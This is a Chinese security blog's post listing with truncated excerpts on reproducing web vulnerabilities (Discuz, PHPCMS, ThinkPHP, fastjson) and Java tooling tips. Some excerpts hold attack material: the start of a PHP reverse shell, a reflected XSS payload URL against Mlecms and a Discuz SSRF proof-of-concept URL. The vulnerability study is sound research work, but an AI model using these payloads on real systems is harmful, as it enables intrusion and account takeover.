自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(57)
  • 收藏
  • 关注

转载 jar包中存在包名和类名都相同的情况

情况:  在maven中引入两个包都有项目的包名和类名,只是jar包的名字不同。两个包的一部分在代码中的不同地方都需要用到。网上找的大部分都是:  只有改变编译器优先选择的jar顺序(这个顺序是可以改变的):包jdk放到前面就好了。解决:在maven中也是这样,只要调整好dependency的顺序,选定优先选择哪个包就能解决 <depend...

2019-07-09 12:25:00 1583

转载 java反序列化字节转字符串工具

https://github.com/NickstaDB/SerializationDumperSerializationDumper-v1.1.jar用法 :java -jar SerializationDumper-v1.1.jar aced000573720026636e2e656d61792e...转载于:https://www.cnblogs.co...

2019-06-25 16:41:00 722

转载 certbot更新错误

自动更新老是提示这个错误。root@vultr:~/certbot# ./certbot-autoUpgrading certbot-auto 0.29.1 to 0.34.2...Couldn't verify signature of downloaded certbot-auto. Command '[u'openssl', u'dgst', u'-sha256',...

2019-05-27 21:58:00 761

转载 Java下的tinylog日志打印

做个笔记。做某个功能时需要DEBUG调试日志,但是直接System.out.println 是打印在终端,有些情况下是看不到输出的,所以需要用日志框架去打印输出值。经过搜索完以后发现Logback性能等方面都比较好,打算选它做日志框架时,发现其他的jar包里面也有Logback,起冲突了,修改这个jar包又比较麻烦。于是又找了一个比较小众的日志框架tinylog。tin...

2019-05-24 16:55:00 514

转载 rmi的调用

在java8 121版本以前,只要这样就能任意代码rmiTest.javaimport javax.naming.InitialContext;import javax.naming.NamingException;public class rmiTest { public static void main(String[] args) thro...

2019-05-09 19:56:00 91

转载 linux下hex转ascii

场景:在wireshark里面提取response包的值。echo -n "1f8b08000000000000030cd335b2e580014" | xxd -r -p >1.gzip  转载于:https://www.cnblogs.com/yangxiaodi/p/10636004.html...

2019-04-01 14:02:00 981

转载 CSP攻略

看完三篇文章应该就懂了csp是干嘛的。https://www.cnblogs.com/Wayou/p/intro_to_content_security_policy.htmlhttps://www.w3.org/TR/CSP3/http://drops.xmd5.com/static/drops/papers-15120.html如果内部要使用CSP(1)搭建...

2018-12-28 22:53:00 605

转载 ThinkPHP5代码执行的简单分析

漏洞影响版本:ThinkPHP 5.0.5-5.0.22ThinkPHP 5.1.0-5.1.30漏洞复现:  一.mac的debug环境搭建。    一键化环境搭建工具: mamp pro ,调试工具 PHPstorm    打开mamp pro,设置左上角的file->Edit Template, 设置httpd.conf (监听本地)...

2018-12-13 18:41:00 487

转载 使用IEDA远程调试

下面演示在docker中调试代码。  使用vulhub作为演示。  下载vulhub,进入vulhub/fastjson/vuln/    编辑docker-compose.yml ,在最后新建一行加入 - "8081:8081" 然后开始编译和运行环境    docker-compose build    docker-compose up -d  环...

2018-12-06 15:40:00 127

转载 Apache Roller 5.0.3 XXE漏洞分析

下载5.0.2的版本来分析5.0.2的war包地址 http://archive.apache.org/dist/roller/roller-5/v5.0.2/bin/roller-weblogger-5.0.2-for-javaee.zip从web.xml入手分析,可以看到如下servlet映射 <servlet> <se...

2018-09-21 10:49:00 172

转载 fastjson 反序列化漏洞笔记,比较乱

现在思路还是有点乱,希望后面能重新写先上pon.xml 包<?xml version="1.0" encoding="UTF-8"?><project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-insta...

2018-09-15 19:52:00 465

转载 JAVA常见安全问题复现

地址来源于乌云知识库,作者z_zz_zzz0x01 任意文件下载web.xml的配置: <servlet> <description></description> <display-name>DownloadAction</display-name> ...

2018-05-21 15:48:00 150

转载 Spring Integration Zip不安全解压(CVE-2018-1261)漏洞复现

不敢说分析,还是太菜了,多学习。文章来源: 猎户安全实验室存在漏洞的源码下载地址:https://github.com/spring-projects/spring-integration-extensions/releases/tag/zip.v1.0.0.RELEASE代码下载两眼相望了好久,第一次弄这些东西,踩了好久的坑,边踩边学习。用的是IDEA来复现: 终...

2018-05-14 16:54:00 334

转载 php一句话反弹bash shell

来源:https://www.leavesongs.com/PHP/backshell-via-php.html用到了,记录一下$sock = fsockopen($ip, $port);$descriptorspec = array( 0 => $sock, 1 => $sock, 2 => ...

2018-04-21 09:38:00 474

转载 dnslog搭建

为什么想重写这个呢,想说后面扫描ssrf和命令执行的时候,能快速改成自己想要的api,更容易修改一些。工具改自:https://github.com/bugScanTeam/DNSLog需要两个域名和一台服务器。推荐这里买一个.pw域名,可以自定义dns服务器。https://cn.resellerclub.com/上面两张图是在resellerclub...

2018-02-14 23:21:00 2936

转载 阅读DSSS.py 并修改成支持python3.6

项目地址:https://github.com/stamparm/DSSS功能:一款小型注入工具代码如下URL:https://github.com/stamparm/DSSS/blob/master/dsss.py 1 if __name__ == "__main__": 2 print "%s #v%s\n by: %s\n" % (NAME, VE...

2018-02-04 18:14:00 307

转载 将python代码打印成pdf

将python代码打印成pdf,打印出来很丑,完全不能看。mac下:pycharm编辑器有print的功能,但是会提示: Error: No print service found.所以需要一个pdf虚拟机。https://github.com/rodyager/RWTS-PDFwriter安装以后就能使用。打印出来太丑没法看转载于:https:/...

2018-01-26 21:30:00 2034

转载 Python的hasattr() getattr() setattr() 函数使用方法详解 (转)

来自:https://www.cnblogs.com/cenyu/p/5713686.htmlhasattr(object, name)判断一个对象里面是否有name属性或者name方法,返回BOOL值,有name特性返回True, 否则返回False。需要注意的是name要用括号括起来>>> class test():... name="xia...

2018-01-12 14:09:00 61

转载 burp的dns记录功能

写个备忘。先点copy复制url,然后生成的url就能用了。一关就没了,比较鸡肋些,不适合持久的,适合马上就能见效果的那种。转载于:https://www.cnblogs.com/yangxiaodi/p/8135316.html...

2017-12-28 13:50:00 2193

转载 python2.7-巡风源码阅读

推荐个脚本示例网站:https://www.programcreek.com/python/example/404/thread.start_new_thread,里面可以搜索函数在代码中的写法,只有部分函数。github地址:https://github.com/ysrc/xunfeng 根据官网给出的安装方法安装,然后启动run.sh#!/bin/bashsu...

2017-12-17 15:13:00 182

转载 《linux 网络日志分析与流量监控》记录

mac中有个本机连接vpn的日志,/private/var/log/ppp.log 消除日志(echo "" >/private/var/log/ppp.log )linux中的各种日志:  (1)ssh日志错误记录 /var/log/secure  (2)dns日志 /var/log/messages ,剥离方法: cat/var/log/messages...

2017-11-25 11:22:00 1162

转载 mysql \N 的疑惑

\N 在mysql查询为NULL好像是可以代替成一个字符串,并与后面的单词隔绝,我的理解为下图这样还是不懂为啥会这样。转载于:https://www.cnblogs.com/yangxiaodi/p/7605906.html...

2017-09-28 11:33:00 194

转载 osx mitmproxy ssl 错误

记录一下,总是在这里折腾。cd ~cd .mitmproxycp mitmproxy-ca-cert.pem ~/然后到目录下双击mitmproxy-ca-cert.pem ,在钥匙串中的登录框信任他,就能进行监听。不知道重启以后会不会失效(待实验)转载于:https://www.cnblogs.com/yangxiaodi/p/7483569.html...

2017-09-06 11:07:00 196

转载 持久化 XSS:ServiceWorkers 利用

来源:http://www.mottoin.com/95058.html来源:https://www.owasp.org/images/3/35/2017-04-20-JSONPXSS.pdfServiceWorkers 看完好像需要三个条件。 1.只在 HTTPS 下工作 2.安装ServiceWorker的脚本需要当前域下,且返回的 content-type 包含 /j...

2017-08-17 14:24:00 329

转载 chall.tasteless.eu 中的注入题

第一题好像就很难,看了payload,算是涨见识了,感觉有点为了猜而猜。题目给我们的时候是这样的:http://chall.tasteless.eu/level1/index.php?dir=ASCasc,desc 一对好基友,所以猜测是order by 后的注入。然后有个提示:Capture the flag! hint: table level1_flag column f...

2017-06-24 21:21:00 331

转载 preg_replace引发的phpmyadmin(4.3.0-4.6.2)命令执行漏洞

编辑器坏了 (:今天看到这个phpmyadmin的代码执行,https://www.waitalone.cn/phpmyadmin-preg_replace-rce.html记录一下:preg_replace()函数http://php.net/manual/zh/function.preg-replace.phpphp 7.0.0不再支持 /e修饰符。 ...

2017-06-22 17:27:00 180

转载 seacms6.5 注入漏洞1

---恢复内容开始---需要开启/data/admin/isapi.txt ,当里面的数值为1时,就可以报错注入存在漏洞的页面:zyapi.php function cj(){ global $dsql,$rtype,$rpage,$rkey,$rday,$action,$app_apiver,$app_apipagenum,$cfg_basehost,$...

2017-06-22 09:58:00 259

转载 cmseasy CmsEasy_5.6_20151009 无限制报错注入(parse_str()的坑)

来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0137013.htmlparse_str()引发的注入,//parse_str()的作用是解析字符串并且把字符串注册成变量,第二个参数$arr是一个数组,parse_str()之前会先urldecode,也就是会二次url解码,实现单引号逃逸。漏洞距离现在好像...

2017-06-08 16:41:00 248

转载 Mlecms 反射型xss && 后台任意文件下载

应该算0day吧,自己分析出来的,有点鸡肋,不过小cms分析确实比较简单。xss地址:search.php?word=a><img+src=1+onerror=alert`1`>a&type=1对于word的参数,他的过滤是这样的 $trim_str = ' .,;[]|+-=_`~!@#$%^&*()<>?{}...

2017-06-06 16:22:00 439

转载 Mlecms Getshell

参考来源:https://bbs.ichunqiu.com/thread-13703-1-1.html位于:/inc/include/globals.php 第24-28行。有个任意变量覆盖。foreach(array('_GET','_POST','_COOKIE') as $_request){ foreach($$_request as $i => &...

2017-06-05 17:47:00 293

转载 Discuz利用UC_KEY进行前台getshell

来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0137991.html先通过uc_key把恶意代码保存在/uc_client/data/cache/badwords.php,然后利用preg_replace() 进行任意代码执行。先附上来源中的脚本。修改了一些代码。<?php$timestamp = ti...

2017-06-02 19:25:00 985

转载 Discuz 5.x 6.x 7.x 前台SQL注入漏洞

来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-071516.html漏洞出现在/include/editpost.inc.php。 if($thread['special'] == 1 && ($alloweditpoll || $isorigauthor) && !empty($p...

2017-06-02 09:13:00 431

转载 Discuz!另一处SSRF无须登陆无须条件

漏洞来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0151179.html看看poc:http://phpstudy.com/Discuz_X2/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://11aadds332.nrcu...

2017-05-31 23:51:00 306

转载 Discuz! 7.x 反射型xss

引用:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-084097.html在/include/global.func.php 文件中 第1036-1119行中function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) ...

2017-05-29 20:59:00 223

转载 Discuz! 6.x/7.x 全局变量防御绕过导致命令执行

参考:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-080723.html文件位于:include/discuzcode.func.php 第97-241行 函数 discuzcode()有这么一句话,$GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['...

2017-05-29 20:05:00 235

转载 Discuz!X 系列 HTTP_X_FORWARDED_FOR 绕过限制进行密码爆破

分析有个不对头的地方:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-080211.html后面再补这个漏洞比较简单。我们看到配置文件来。/include/common.inc.php 第86-94行。if(getenv('HTTP_CLIENT_IP') && strcasecmp(geten...

2017-05-29 11:25:00 481

转载 discuz7.2 faq.php 注入漏洞分析

写在前面的话:分析完整个漏洞,不得不感叹,发现漏洞的人真的好细心呀。在分析整个漏洞之前,没看poc,然后就直接看faq.php 准备试试自己发现漏洞的能力,但是分析完一整个php,也是卡在 in() 这里,因为整个faq.php就这里的参数是可控的。但是也没看出什么来,最后看了poc之后焕然大悟,然后开始感慨。先看poc吧,按着poc来分析。/faq.php?actio...

2017-05-28 16:49:00 501

转载 PHPCMS v9.5.6 通杀getshell(前台)

漏洞url:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-062881.html很好的fuzz思路。文章提到:文件名前面的数字是被"干掉"字符的十进制数字,可以看出%81--%99会被干掉.该特性雷同Windows下对"."和" "(空格), ::$DATA的忽略。这个特性可以用来绕过安全狗,比如 xxx.php. ...

2017-05-27 15:31:00 501

转载 PHPCMS某处设计缺陷可致authkey泄露

在分析几个phpcms的漏洞就换分析其他的,换换口味。漏洞来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0106892.htmlswfupload上传页面输出了 MD5(auth_key+sess_id)。函数位于 /phpcms/modules/attachment/functions/global.func.php...

2017-05-25 20:41:00 409

转载 PHPCMS v9.5.8-设计缺陷可重置前台任意用户密码

验证。参考漏洞:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0152291.html漏洞出现在/phpcms/modules/member/index.php 第1687-1756行public_forget_password_username()函数 public function public_forget_...

2017-05-23 23:10:00 422

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除